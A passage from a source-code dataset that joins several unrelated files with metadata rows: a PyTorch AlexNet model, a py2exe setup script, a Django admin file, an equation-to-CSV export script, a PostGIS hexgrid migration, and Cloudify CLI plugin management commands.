}
class AlexNet(nn.Module):
def __init__(self, num_classes=10):
super(AlexNet, self).__init__()
self.features = nn.Sequential(
nn.Conv2d(3, 64, kernel_size=3, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(64, 192, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(192, 384, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(384, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
)
self.classifier = nn.Sequential(
nn.Dropout(),
nn.Linear(256 * 2 * 2, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Linear(4096, num_classes),
)
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), 256 * 2 * 2)
x = self.classifier(x)
#print(x.size())
return x
'''
def alexnet(pretrained=False, **kwargs):
r"""AlexNet model architecture from the
`"One weird trick..." <https://arxiv.org/abs/1404.5997>`_ paper.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = AlexNet(**kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['alexnet']))
return model
'''
| 30.711864
| 78
| 0.571192
|
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
__all__ = ['AlexNet', 'alexnet']
model_urls = {
'alexnet': 'https://download.pytorch.org/models/alexnet-owt-4df8aa71.pth',
}
class AlexNet(nn.Module):
def __init__(self, num_classes=10):
super(AlexNet, self).__init__()
self.features = nn.Sequential(
nn.Conv2d(3, 64, kernel_size=3, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(64, 192, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(192, 384, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(384, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
)
self.classifier = nn.Sequential(
nn.Dropout(),
nn.Linear(256 * 2 * 2, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Linear(4096, num_classes),
)
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), 256 * 2 * 2)
x = self.classifier(x)
return x
| true
| true
|
1c42243bb54c2335aeb253f2b0b05b730467c11e
| 163
|
py
|
Python
|
setup.py
|
DixiGroup/fuel_flow
|
d869c417d0fded452409e6572d94b77317262326
|
[
"MIT"
] | null | null | null |
setup.py
|
DixiGroup/fuel_flow
|
d869c417d0fded452409e6572d94b77317262326
|
[
"MIT"
] | null | null | null |
setup.py
|
DixiGroup/fuel_flow
|
d869c417d0fded452409e6572d94b77317262326
|
[
"MIT"
] | null | null | null |
from distutils.core import setup
import py2exe
setup(console=[{'script':'fuel_transform.py'}],
options={"py2exe":{"includes":["xlrd", "xlsxwriter"]}})
| 27.166667
| 62
| 0.668712
|
from distutils.core import setup
import py2exe
setup(console=[{'script':'fuel_transform.py'}],
options={"py2exe":{"includes":["xlrd", "xlsxwriter"]}})
| true
| true
|
1c42256fb3332783211a320c3ff901c2043853b1
| 112
|
py
|
Python
|
api/admin.py
|
vulture990/memo-App
|
8cbb63392682f57d29758dc8e842a4f1f8a4e9c3
|
[
"MIT"
] | null | null | null |
api/admin.py
|
vulture990/memo-App
|
8cbb63392682f57d29758dc8e842a4f1f8a4e9c3
|
[
"MIT"
] | 3
|
2020-06-05T18:14:29.000Z
|
2021-06-10T20:17:57.000Z
|
api/admin.py
|
vulture990/memo-App
|
8cbb63392682f57d29758dc8e842a4f1f8a4e9c3
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Note
# Register your models here.
admin.site.register(Note)
| 28
| 32
| 0.8125
|
from django.contrib import admin
from .models import Note
admin.site.register(Note)
| true
| true
|
1c4226e431d31b4206940f44ee3e0b27310391b5
| 2,196
|
py
|
Python
|
scripts/csv_handling/dataload_format_to_csv.py
|
samholt/NeuralSymbolicRegressionThatScales
|
da023e5a3fdf157ab60e56a966eeea0129366bfc
|
[
"MIT"
] | 27
|
2021-06-17T07:31:55.000Z
|
2022-03-16T14:52:16.000Z
|
scripts/csv_handling/dataload_format_to_csv.py
|
samholt/NeuralSymbolicRegressionThatScales
|
da023e5a3fdf157ab60e56a966eeea0129366bfc
|
[
"MIT"
] | 9
|
2021-07-05T12:58:42.000Z
|
2022-03-31T15:11:36.000Z
|
scripts/csv_handling/dataload_format_to_csv.py
|
samholt/NeuralSymbolicRegressionThatScales
|
da023e5a3fdf157ab60e56a966eeea0129366bfc
|
[
"MIT"
] | 5
|
2021-06-26T19:07:43.000Z
|
2022-03-23T15:09:31.000Z
|
import pandas as pd
import numpy as np
import multiprocessing
from multiprocessing import Manager
import click
import warnings
from tqdm import tqdm
import json
import os
from nesymres.dataset import generator
import time
import signal
from pathlib import Path
import pickle
from sympy import lambdify
from nesymres.utils import create_env, load_metadata_hdf5, load_eq
from nesymres.dataset import data_utils
import copyreg
import types
from itertools import chain
import traceback
import sympy as sp
from nesymres.dataset.sympy_utils import add_multiplicative_constants, add_additive_constants
import random
import hydra
from tqdm import tqdm
def create_df(path,metadata,cfg, constats_on = False):
rows = {"eq": [], "support": [], "num_points": []}
for idx in tqdm(range(metadata.total_number_of_eqs)):
eq = load_eq(path, idx, metadata.eqs_per_hdf)
w_const, wout_consts = data_utils.sample_symbolic_constants(eq,cfg.dataset_test.constants)
if constats_on:
dict_const = w_const
else:
dict_const = wout_consts
eq_string = eq.expr.format(**dict_const)
eq_string = str(sp.simplify(eq_string))
d = {}
if not eq.support:
for var in eq.variables:
d[var] = cfg.dataset_test.fun_support
rows["eq"].append(str(eq_string))
rows["support"].append(str(d))
rows["num_points"].append(cfg.dataset_test.max_number_of_points)
dataset = pd.DataFrame(rows)
return dataset
@hydra.main(config_name="../config")
def converter(cfg):
df = pd.DataFrame()
path = hydra.utils.to_absolute_path(cfg.raw_test_path)
metadata = load_metadata_hdf5(path)
df = create_df(path,metadata,cfg,constats_on = False)
df.to_csv(hydra.utils.to_absolute_path("test_set/test_nc.csv"))
df = create_df(path,metadata,cfg,constats_on = True)
df.to_csv(hydra.utils.to_absolute_path("test_set/test_wc.csv"))
# dataset.to_csv(hydra.utils.to_absolute_path("test_set/test.csv"))
# with open(hydra.utils.to_absolute_path("data/benchmark/test_csv"), "wb") as file:
# pickle.dump(dataset, file)
if __name__ == "__main__":
converter()
| 32.776119
| 98
| 0.718124
|
import pandas as pd
import numpy as np
import multiprocessing
from multiprocessing import Manager
import click
import warnings
from tqdm import tqdm
import json
import os
from nesymres.dataset import generator
import time
import signal
from pathlib import Path
import pickle
from sympy import lambdify
from nesymres.utils import create_env, load_metadata_hdf5, load_eq
from nesymres.dataset import data_utils
import copyreg
import types
from itertools import chain
import traceback
import sympy as sp
from nesymres.dataset.sympy_utils import add_multiplicative_constants, add_additive_constants
import random
import hydra
from tqdm import tqdm
def create_df(path,metadata,cfg, constats_on = False):
rows = {"eq": [], "support": [], "num_points": []}
for idx in tqdm(range(metadata.total_number_of_eqs)):
eq = load_eq(path, idx, metadata.eqs_per_hdf)
w_const, wout_consts = data_utils.sample_symbolic_constants(eq,cfg.dataset_test.constants)
if constats_on:
dict_const = w_const
else:
dict_const = wout_consts
eq_string = eq.expr.format(**dict_const)
eq_string = str(sp.simplify(eq_string))
d = {}
if not eq.support:
for var in eq.variables:
d[var] = cfg.dataset_test.fun_support
rows["eq"].append(str(eq_string))
rows["support"].append(str(d))
rows["num_points"].append(cfg.dataset_test.max_number_of_points)
dataset = pd.DataFrame(rows)
return dataset
@hydra.main(config_name="../config")
def converter(cfg):
df = pd.DataFrame()
path = hydra.utils.to_absolute_path(cfg.raw_test_path)
metadata = load_metadata_hdf5(path)
df = create_df(path,metadata,cfg,constats_on = False)
df.to_csv(hydra.utils.to_absolute_path("test_set/test_nc.csv"))
df = create_df(path,metadata,cfg,constats_on = True)
df.to_csv(hydra.utils.to_absolute_path("test_set/test_wc.csv"))
if __name__ == "__main__":
converter()
| true
| true
|
1c4227fd30ccc3e48c9226b868ed03f448567525
| 5,611
|
py
|
Python
|
src/django/api/migrations/0033_add_generate_hexgrid_function_20190909.py
|
azavea/open-apparel-registry
|
20f7a6d502d9152c85ee7f2696b25b6badf98924
|
[
"MIT"
] | 32
|
2019-01-26T05:04:03.000Z
|
2022-03-11T15:09:09.000Z
|
src/django/api/migrations/0033_add_generate_hexgrid_function_20190909.py
|
azavea/open-apparel-registry
|
20f7a6d502d9152c85ee7f2696b25b6badf98924
|
[
"MIT"
] | 1,586
|
2019-01-15T21:54:42.000Z
|
2022-03-31T17:38:14.000Z
|
src/django/api/migrations/0033_add_generate_hexgrid_function_20190909.py
|
Home-ac/Base0
|
04f03b8bf31146783c583df0871ab69fd6309a27
|
[
"MIT"
] | 7
|
2019-02-28T03:32:46.000Z
|
2021-11-04T17:03:46.000Z
|
# Generated by Django 2.2.3 on 2019-09-09 21:11
from django.db import migrations
# SOURCE: https://gist.github.com/mjumbewu/1761802ea06fb78c596f9cf8c9b2e769
create_generate_hexgrid = """
/*
The default SRID is EPSG 3857 (web mercator -- https://epsg.io/3857). However
you can use any SRID you want. All input parameters should be interpreted as
coordinates and distances in whatever the SRID is set to.
SRID 3857 units are [very approximately] meters, and using this projection will
create hex cells that "look right" on a web map (most of which use a web mercator
projection).
If you have bounds in lat/lng degrees, you can convert those into web mercator.
To use EPSG 4326 (geodetic latitude and longitude -- https://epsg.io/4326)
degrees as the bounds, you can do the following:
SELECT gid, ST_Transform(geom, 4326) AS geom
FROM generate_hexgrid(
-- Width of cell, in meters
8192,
-- Minimum x and y
ST_X(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-75.60447692871092 39.782685009007075)'), 4326), 3857)),
ST_Y(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-75.60447692871092 39.782685009007075)'), 4326), 3857)),
-- Maximum x and y
ST_X(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-74.78736877441406 40.159459579477925)'), 4326), 3857)),
ST_Y(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-74.78736877441406 40.159459579477925)'), 4326), 3857)),
-- The input SRID, default 3857
3857
);
The geometry returned from this function also uses EPSG 3857 coordinates, or
whatever the input SRID is, hence the use of an additional ST_Transform in the
SELECT above.
The gid should be unique for (and characteristic to) each cell. In other words,
If you run this function twice with two distinct but overlapping bounding boxes
using the same cell width, the cells that overlap should have the same gid. So,
if you INSERT these cells into a table with a unique gid column, you should be
able to ignore conflicts (ON CONFLICT DO NOTHING).
Adapted from http://rexdouglass.com/spatial-hexagon-binning-in-postgis/
Snapping inspired by https://medium.com/@goldrydigital/hex-grid-algorithm-for-postgis-4ac45f61d093
*/
CREATE OR REPLACE FUNCTION generate_hexgrid(width float, xmin float, ymin float, xmax float, ymax float, srid int default 3857)
RETURNS TABLE(
gid text,
geom geometry(Polygon)
) AS $grid$
declare
b float := width / 2;
a float := tan(radians(30)) * b; -- tan(30) = 0.577350269
c float := 2 * a;
-- NOTE: The height of one cell is (2a + c), or about 1.154700538 * width.
-- however, for each row, we shift vertically by (2[a + c]) to properly
-- tesselate the hexagons. Thus, to determine the number of rows needed,
-- we use the latter formula as the height of a row.
height float := 2 * (a + c);
-- Snap the min/max coords to a global grid according to the cell width, so
-- that we minimize the chances of generating misaligned grids for overlapping
-- regions.
index_xmin int := floor(xmin / width);
index_ymin int := floor(ymin / height);
index_xmax int := ceil(xmax / width);
index_ymax int := ceil(ymax / height);
snap_xmin float := index_xmin * width;
snap_ymin float := index_ymin * height;
snap_xmax float := index_xmax * width;
snap_ymax float := index_ymax * height;
-- Calculate the total number of columns and rows. Note that the number of
-- rows is actually half the number of rows, since each vertical iteration
-- accounts for two "rows".
ncol int := abs(index_xmax - index_xmin);
nrow int := abs(index_ymax - index_ymin);
polygon_string varchar := 'POLYGON((' ||
0 || ' ' || 0 || ' , ' ||
b || ' ' || a || ' , ' ||
b || ' ' || a + c || ' , ' ||
0 || ' ' || a + c + a || ' , ' ||
-1 * b || ' ' || a + c || ' , ' ||
-1 * b || ' ' || a || ' , ' ||
0 || ' ' || 0 ||
'))';
BEGIN
RETURN QUERY
SELECT
-- gid is made of the global x index of the cell, the global y index of the
-- cell, and the cell width.
format('%s %s %s',
width,
x_offset + (1 * x_series + index_xmin),
y_offset + (2 * y_series + index_ymin)),
-- geom is transformed using the width and height of a series, and set to
-- the SRID specified.
ST_SetSRID(ST_Translate(two_hex.geom,
x_series * width + snap_xmin,
y_series * height + snap_ymin), srid)
FROM
generate_series(0, ncol, 1) AS x_series,
generate_series(0, nrow, 1) AS y_series,
-- two_hex is a pair of hex cells, one roughly below the other. Thus, both
-- have an x_offset of 0, but the second has a y_offset of 1.
(
-- Series cell #1
SELECT
0 AS x_offset,
0 AS y_offset,
polygon_string::geometry AS geom
UNION
-- Series cell #2
SELECT
0 AS x_offset,
1 AS y_offset,
ST_Translate(polygon_string::geometry, b , a + c) AS geom
) AS two_hex;
END;
$grid$ LANGUAGE plpgsql;
"""
drop_generate_hexgrid = "DROP FUNCTION generate_hexgrid;"
class Migration(migrations.Migration):
dependencies = [
('api', '0032_add_tile_version_row'),
]
operations = [
migrations.RunSQL(create_generate_hexgrid, drop_generate_hexgrid)
]
| 37.406667
| 127
| 0.629478
|
from django.db import migrations
create_generate_hexgrid = """
/*
The default SRID is EPSG 3857 (web mercator -- https://epsg.io/3857). However
you can use any SRID you want. All input parameters should be interpreted as
coordinates and distances in whatever the SRID is set to.
SRID 3857 units are [very approximately] meters, and using this projection will
create hex cells that "look right" on a web map (most of which use a web mercator
projection).
If you have bounds in lat/lng degrees, you can convert those into web mercator.
To use EPSG 4326 (geodetic latitude and longitude -- https://epsg.io/4326)
degrees as the bounds, you can do the following:
SELECT gid, ST_Transform(geom, 4326) AS geom
FROM generate_hexgrid(
-- Width of cell, in meters
8192,
-- Minimum x and y
ST_X(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-75.60447692871092 39.782685009007075)'), 4326), 3857)),
ST_Y(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-75.60447692871092 39.782685009007075)'), 4326), 3857)),
-- Maximum x and y
ST_X(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-74.78736877441406 40.159459579477925)'), 4326), 3857)),
ST_Y(ST_Transform(ST_SetSRID(ST_GeomFromText('POINT(-74.78736877441406 40.159459579477925)'), 4326), 3857)),
-- The input SRID, default 3857
3857
);
The geometry returned from this function also uses EPSG 3857 coordinates, or
whatever the input SRID is, hence the use of an additional ST_Transform in the
SELECT above.
The gid should be unique for (and characteristic to) each cell. In other words,
If you run this function twice with two distinct but overlapping bounding boxes
using the same cell width, the cells that overlap should have the same gid. So,
if you INSERT these cells into a table with a unique gid column, you should be
able to ignore conflicts (ON CONFLICT DO NOTHING).
Adapted from http://rexdouglass.com/spatial-hexagon-binning-in-postgis/
Snapping inspired by https://medium.com/@goldrydigital/hex-grid-algorithm-for-postgis-4ac45f61d093
*/
CREATE OR REPLACE FUNCTION generate_hexgrid(width float, xmin float, ymin float, xmax float, ymax float, srid int default 3857)
RETURNS TABLE(
gid text,
geom geometry(Polygon)
) AS $grid$
declare
b float := width / 2;
a float := tan(radians(30)) * b; -- tan(30) = 0.577350269
c float := 2 * a;
-- NOTE: The height of one cell is (2a + c), or about 1.154700538 * width.
-- however, for each row, we shift vertically by (2[a + c]) to properly
-- tesselate the hexagons. Thus, to determine the number of rows needed,
-- we use the latter formula as the height of a row.
height float := 2 * (a + c);
-- Snap the min/max coords to a global grid according to the cell width, so
-- that we minimize the chances of generating misaligned grids for overlapping
-- regions.
index_xmin int := floor(xmin / width);
index_ymin int := floor(ymin / height);
index_xmax int := ceil(xmax / width);
index_ymax int := ceil(ymax / height);
snap_xmin float := index_xmin * width;
snap_ymin float := index_ymin * height;
snap_xmax float := index_xmax * width;
snap_ymax float := index_ymax * height;
-- Calculate the total number of columns and rows. Note that the number of
-- rows is actually half the number of rows, since each vertical iteration
-- accounts for two "rows".
ncol int := abs(index_xmax - index_xmin);
nrow int := abs(index_ymax - index_ymin);
polygon_string varchar := 'POLYGON((' ||
0 || ' ' || 0 || ' , ' ||
b || ' ' || a || ' , ' ||
b || ' ' || a + c || ' , ' ||
0 || ' ' || a + c + a || ' , ' ||
-1 * b || ' ' || a + c || ' , ' ||
-1 * b || ' ' || a || ' , ' ||
0 || ' ' || 0 ||
'))';
BEGIN
RETURN QUERY
SELECT
-- gid is made of the global x index of the cell, the global y index of the
-- cell, and the cell width.
format('%s %s %s',
width,
x_offset + (1 * x_series + index_xmin),
y_offset + (2 * y_series + index_ymin)),
-- geom is transformed using the width and height of a series, and set to
-- the SRID specified.
ST_SetSRID(ST_Translate(two_hex.geom,
x_series * width + snap_xmin,
y_series * height + snap_ymin), srid)
FROM
generate_series(0, ncol, 1) AS x_series,
generate_series(0, nrow, 1) AS y_series,
-- two_hex is a pair of hex cells, one roughly below the other. Thus, both
-- have an x_offset of 0, but the second has a y_offset of 1.
(
-- Series cell #1
SELECT
0 AS x_offset,
0 AS y_offset,
polygon_string::geometry AS geom
UNION
-- Series cell #2
SELECT
0 AS x_offset,
1 AS y_offset,
ST_Translate(polygon_string::geometry, b , a + c) AS geom
) AS two_hex;
END;
$grid$ LANGUAGE plpgsql;
"""
drop_generate_hexgrid = "DROP FUNCTION generate_hexgrid;"
class Migration(migrations.Migration):
dependencies = [
('api', '0032_add_tile_version_row'),
]
operations = [
migrations.RunSQL(create_generate_hexgrid, drop_generate_hexgrid)
]
| true
| true
|
1c42284aa5378a568fc95740857cb45663a7a7c1
| 15,896
|
py
|
Python
|
cloudify_cli/commands/plugins.py
|
TS-at-WS/cloudify-cli
|
598b54ecd67495a76678177f910cdc5eac6128d0
|
[
"Apache-2.0"
] | null | null | null |
cloudify_cli/commands/plugins.py
|
TS-at-WS/cloudify-cli
|
598b54ecd67495a76678177f910cdc5eac6128d0
|
[
"Apache-2.0"
] | 10
|
2020-08-02T07:45:42.000Z
|
2021-06-11T01:03:45.000Z
|
cloudify_cli/commands/plugins.py
|
TS-at-WS/cloudify-cli
|
598b54ecd67495a76678177f910cdc5eac6128d0
|
[
"Apache-2.0"
] | null | null | null |
########
# Copyright (c) 2018 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
############
import os
import wagon
from cloudify_cli import execution_events_fetcher
from cloudify_cli.logger import get_events_logger
from cloudify_cli.exceptions import SuppressedCloudifyCliError
from cloudify_rest_client.constants import VISIBILITY_EXCEPT_PRIVATE
from .. import utils
from ..table import print_data, print_single
from ..cli import helptexts, cfy
from ..utils import (prettify_client_error,
get_visibility,
validate_visibility)
PLUGIN_COLUMNS = ['id', 'package_name', 'package_version', 'distribution',
'supported_platform', 'distribution_release', 'uploaded_at',
'visibility', 'tenant_name', 'created_by', 'yaml_url_path']
PLUGINS_UPDATE_COLUMNS = ['id', 'state', 'blueprint_id', 'temp_blueprint_id',
'execution_id', 'deployments_to_update',
'visibility', 'created_at', 'forced']
GET_DATA_COLUMNS = ['file_server_path']
EXCLUDED_COLUMNS = ['archive_name', 'distribution_version', 'excluded_wheels',
'package_source', 'supported_py_versions', 'wheels']
@cfy.group(name='plugins')
@cfy.options.common_options
def plugins():
"""Handle plugins on the manager
"""
pass
@plugins.command(name='validate',
short_help='Validate a plugin')
@cfy.argument('plugin-path')
@cfy.options.common_options
@cfy.pass_logger
def validate(plugin_path, logger):
"""Validate a plugin
This will try to validate the plugin's archive is not corrupted.
A valid plugin is a wagon (http://github.com/cloudify-cosomo/wagon)
in the tar.gz format.
`PLUGIN_PATH` is the path to wagon archive to validate.
"""
logger.info('Validating plugin {0}...'.format(plugin_path))
wagon.validate(plugin_path)
logger.info('Plugin validated successfully')
@plugins.command(name='delete',
short_help='Delete a plugin [manager only]')
@cfy.argument('plugin-id')
@cfy.options.force(help=helptexts.FORCE_DELETE_PLUGIN)
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def delete(plugin_id, force, logger, client, tenant_name):
"""Delete a plugin from the manager
`PLUGIN_ID` is the id of the plugin to delete.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Deleting plugin {0}...'.format(plugin_id))
client.plugins.delete(plugin_id=plugin_id, force=force)
logger.info('Plugin deleted')
@plugins.command(name='upload',
short_help='Upload a plugin [manager only]')
@cfy.argument('plugin-path')
@cfy.options.plugin_yaml_path()
@cfy.options.private_resource
@cfy.options.visibility()
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.pass_context
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def upload(ctx,
plugin_path,
yaml_path,
private_resource,
visibility,
logger,
client,
tenant_name):
"""Upload a plugin to the manager
`PLUGIN_PATH` is the path to wagon archive to upload.
"""
# Test whether the path is a valid URL. If it is, no point in doing local
# validations - it will be validated on the server side anyway
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Creating plugin zip archive..')
wagon_path = utils.get_local_path(plugin_path, create_temp=True)
yaml_path = utils.get_local_path(yaml_path, create_temp=True)
zip_path = utils.zip_files([wagon_path, yaml_path])
progress_handler = utils.generate_progress_handler(zip_path, '')
visibility = get_visibility(private_resource, visibility, logger)
logger.info('Uploading plugin archive (wagon + yaml)..')
try:
plugin = client.plugins.upload(zip_path,
visibility,
progress_handler)
logger.info("Plugin uploaded. Plugin's id is {0}".format(plugin.id))
finally:
os.remove(wagon_path)
os.remove(yaml_path)
os.remove(zip_path)
@plugins.command(name='bundle-upload',
short_help='Upload a bundle of plugins [manager only]')
@cfy.options.plugins_bundle_path
@cfy.pass_client()
@cfy.pass_logger
def upload_caravan(client, logger, path):
if not path:
logger.info("Starting upload of plugins bundle, "
"this may take few minutes to complete.")
path = 'http://repository.cloudifysource.org/' \
'cloudify/wagons/cloudify-plugins-bundle.tgz'
progress = utils.generate_progress_handler(path, '')
plugins_ = client.plugins.upload(path, progress_callback=progress)
logger.info("Bundle uploaded, {0} Plugins installed."
.format(len(plugins_)))
if len(plugins_) > 0:
logger.info("The plugins' ids are:\n{0}\n".
format('\n'.join([p.id for p in plugins_])))
@plugins.command(name='download',
short_help='Download a plugin [manager only]')
@cfy.argument('plugin-id')
@cfy.options.output_path
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.pass_logger
@cfy.pass_client()
def download(plugin_id, output_path, logger, client, tenant_name):
"""Download a plugin from the manager
`PLUGIN_ID` is the id of the plugin to download.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Downloading plugin {0}...'.format(plugin_id))
plugin_name = output_path if output_path else plugin_id
progress_handler = utils.generate_progress_handler(plugin_name, '')
target_file = client.plugins.download(plugin_id,
output_path,
progress_handler)
logger.info('Plugin downloaded as {0}'.format(target_file))
@plugins.command(name='get',
short_help='Retrieve plugin information [manager only]')
@cfy.argument('plugin-id')
@cfy.options.common_options
@cfy.options.get_data
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def get(plugin_id, logger, client, tenant_name, get_data):
"""Retrieve information for a specific plugin
`PLUGIN_ID` is the id of the plugin to get information on.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Retrieving plugin {0}...'.format(plugin_id))
plugin = client.plugins.get(plugin_id, _get_data=get_data)
_transform_plugin_response(plugin)
columns = PLUGIN_COLUMNS + GET_DATA_COLUMNS if get_data else PLUGIN_COLUMNS
print_single(columns, plugin, 'Plugin:')
@plugins.command(name='list',
short_help='List plugins [manager only]')
@cfy.options.sort_by('uploaded_at')
@cfy.options.descending
@cfy.options.tenant_name_for_list(
required=False, resource_name_for_help='plugin')
@cfy.options.all_tenants
@cfy.options.search
@cfy.options.common_options
@cfy.options.get_data
@cfy.options.pagination_offset
@cfy.options.pagination_size
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def list(sort_by,
descending,
tenant_name,
all_tenants,
search,
pagination_offset,
pagination_size,
logger,
client,
get_data):
"""List all plugins on the manager
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Listing all plugins...')
plugins_list = client.plugins.list(sort=sort_by,
is_descending=descending,
_all_tenants=all_tenants,
_search=search,
_get_data=get_data,
_offset=pagination_offset,
_size=pagination_size)
for plugin in plugins_list:
_transform_plugin_response(plugin)
columns = PLUGIN_COLUMNS + GET_DATA_COLUMNS if get_data else PLUGIN_COLUMNS
print_data(columns, plugins_list, 'Plugins:')
total = plugins_list.metadata.pagination.total
logger.info('Showing {0} of {1} plugins'.format(len(plugins_list),
total))
def _transform_plugin_response(plugin):
"""Remove any columns that shouldn't be displayed in the CLI
"""
for column in EXCLUDED_COLUMNS:
plugin.pop(column, None)
@plugins.command(name='set-global',
short_help="Set the plugin's visibility to global")
@cfy.argument('plugin-id')
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client(use_tenant_in_header=True)
@cfy.pass_logger
def set_global(plugin_id, logger, client):
"""Set the plugin's visibility to global
`PLUGIN_ID` is the id of the plugin to set global
"""
status_codes = [400, 403, 404]
with prettify_client_error(status_codes, logger):
client.plugins.set_global(plugin_id)
logger.info('Plugin `{0}` was set to global'.format(plugin_id))
logger.info("This command will be deprecated soon, please use the "
"'set-visibility' command instead")
@plugins.command(name='set-visibility',
short_help="Set the plugin's visibility")
@cfy.argument('plugin-id')
@cfy.options.visibility(required=True, valid_values=VISIBILITY_EXCEPT_PRIVATE)
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client(use_tenant_in_header=True)
@cfy.pass_logger
def set_visibility(plugin_id, visibility, logger, client):
"""Set the plugin's visibility
`PLUGIN_ID` is the id of the plugin to update
"""
validate_visibility(visibility, valid_values=VISIBILITY_EXCEPT_PRIVATE)
status_codes = [400, 403, 404]
with prettify_client_error(status_codes, logger):
client.plugins.set_visibility(plugin_id, visibility)
logger.info('Plugin `{0}` was set to {1}'.format(plugin_id,
visibility))
@plugins.command(name='update',
short_help='Update the plugins of all the deployments of '
'the blueprint [manager only]')
@cfy.argument('blueprint-id')
@cfy.options.common_options
@cfy.options.tenant_name(required=False, resource_name_for_help='plugin')
@cfy.assert_manager_active()
@cfy.options.include_logs
@cfy.options.json_output
@cfy.pass_logger
@cfy.pass_client()
@cfy.options.force(help=helptexts.FORCE_PLUGINS_UPDATE)
def update(blueprint_id,
include_logs,
json_output,
logger,
client,
tenant_name,
force):
"""Update the plugins of all the deployments of the given blueprint. This
will update the deployments one by one until all succeeded.
`BLUEPRINT_ID` the blueprint's ID to perform the plugins update with.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Updating the plugins of the deployments of the blueprint '
'{}'.format(blueprint_id))
plugins_update = client.plugins_update.update_plugins(blueprint_id, force)
events_logger = get_events_logger(json_output)
execution = execution_events_fetcher.wait_for_execution(
client,
client.executions.get(plugins_update.execution_id),
events_handler=events_logger,
include_logs=include_logs,
timeout=None # don't timeout ever
)
if execution.error:
logger.info("Execution of workflow '{0}' for blueprint "
"'{1}' failed. [error={2}]"
.format(execution.workflow_id,
blueprint_id,
execution.error))
logger.info('Failed updating plugins for blueprint {0}. '
'Plugins update ID: {1}. Execution id: {2}'
.format(blueprint_id,
plugins_update.id,
execution.id))
raise SuppressedCloudifyCliError()
logger.info("Finished executing workflow '{0}'".format(
execution.workflow_id))
logger.info('Successfully updated plugins for blueprint {0}. '
'Plugins update ID: {1}. Execution id: {2}'
.format(blueprint_id,
plugins_update.id,
execution.id))
@plugins.command(
name='get-update',
short_help='Retrieve plugins update information [manager only]'
)
@cfy.argument('plugins-update-id')
@cfy.options.common_options
@cfy.options.tenant_name(required=False,
resource_name_for_help='plugins update')
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def manager_get_update(plugins_update_id, logger, client, tenant_name):
"""Retrieve information for a specific plugins update
`PLUGINS_UPDATE_ID` is the id of the plugins update to get information on.
"""
utils.explicit_tenant_name_message(tenant_name, logger)
logger.info('Retrieving plugins update {0}...'.format(plugins_update_id))
plugins_update_dict = client.plugins_update.get(plugins_update_id)
print_single(
PLUGINS_UPDATE_COLUMNS, plugins_update_dict, 'Plugins update:')
@plugins.command(name='history', short_help='List plugins updates '
'[manager only]')
@cfy.options.blueprint_id()
@cfy.options.sort_by()
@cfy.options.descending
@cfy.options.tenant_name_for_list(
required=False, resource_name_for_help='plugins update')
@cfy.options.all_tenants
@cfy.options.search
@cfy.options.pagination_offset
@cfy.options.pagination_size
@cfy.options.common_options
@cfy.assert_manager_active()
@cfy.pass_client()
@cfy.pass_logger
def manager_history(blueprint_id,
sort_by,
descending,
all_tenants,
search,
pagination_offset,
pagination_size,
logger,
client,
tenant_name):
"""Show blueprint history by listing plugins updates
If `--blueprint-id` is provided, list plugins updates for that
